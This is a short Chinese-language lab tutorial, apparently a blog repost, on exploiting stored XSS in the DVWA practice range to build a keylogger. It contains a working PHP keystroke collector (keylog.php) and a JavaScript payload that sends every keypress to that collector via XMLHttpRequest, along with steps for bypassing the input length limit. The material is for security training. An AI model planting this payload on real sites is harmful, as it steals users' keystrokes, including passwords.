漏洞复现篇——利用XSS漏洞实现键盘记录
作者:互联网
实验环境:
- PHPstudy
- 火狐浏览器、IE
- DVWA靶场
实验准备:
在www目录下创建一个名为keylog.php的文件,代码如下:
<?php
$file = fopen("key.txt","a");
if(isset($_REQUEST['key'])) {
$key = $_REQUEST['key'];
fputs($file,$key);
}
?>
模拟实验:
1、把级别调成low,选择Stored储存型,打开F12将输入限制改为500
2、将下列代码输入执行,效果如下
<script>document.onkeydown=function(ev){xhr=new XMLHttpRequest();xhr.open('POST','http://localhost/keylog.php',true);xhr.setRequestHeader('Content-type','application/X-WWW-form-urlencoded');xhr.send('key='+String.fromCharCode(ev.keyCode));}</script>
3、然后随便输入什么东西,key.txt中就会出现记录,键盘记录器就做完了
标签:XSS,键盘记录,xhr,漏洞,keylog,key,ev,php 来源: https://blog.51cto.com/u_15274949/2922469